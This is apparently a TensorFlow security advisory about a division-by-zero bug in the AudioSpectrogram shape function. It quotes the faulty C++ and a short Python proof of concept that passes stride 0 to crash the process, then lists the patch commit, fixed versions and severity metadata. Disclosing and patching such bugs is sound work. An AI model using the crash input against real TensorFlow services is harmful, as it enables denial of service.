version:2.11.0 //core/ops/audio_ops.cc:70
Status SpectrogramShapeFn(InferenceContext* c) { ShapeHandle input; TFRETURNIFERROR(c->WithRank(c->input(0), 2, &input)); int32t windowsize; TFRETURNIFERROR(c->GetAttr("windowsize", &windowsize)); int32t stride; TFRETURNIFERROR(c->GetAttr("stride", &stride)); .....[1]
DimensionHandle inputlength = c->Dim(input, 0); DimensionHandle inputchannels = c->Dim(input, 1);
DimensionHandle outputlength; if (!c->ValueKnown(inputlength)) { outputlength = c->UnknownDim(); } else { const int64t inputlengthvalue = c->Value(inputlength); const int64t lengthminuswindow = (inputlengthvalue - windowsize); int64t outputlengthvalue; if (lengthminuswindow < 0) { outputlengthvalue = 0; } else { outputlengthvalue = 1 + (lengthminuswindow / stride); .....[2] } outputlength = c->MakeDim(outputlength_value); }
Get the value of stride at [1], and the used at [2]
import tensorflow as tf
para = {'input': tf.constant([[14.], [24.]], dtype=tf.float32), 'window_size': 1, 'stride': 0, 'magnitude_squared': False}
func = tf.raw_ops.AudioSpectrogram
@tf.function(jit_compile=True)
def fuzz_jit():
y = func(**para)
return y
fuzz_jit()
We have patched the issue in GitHub commit d0d4e779da0d0f56499c6fa5ba09f0a576cc6b14.
The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
This vulnerability has been reported by r3pwnx
{ "nvd_published_at": "2023-03-25T00:15:00Z", "github_reviewed_at": "2023-03-24T21:57:18Z", "severity": "HIGH", "github_reviewed": true, "cwe_ids": [ "CWE-697" ] }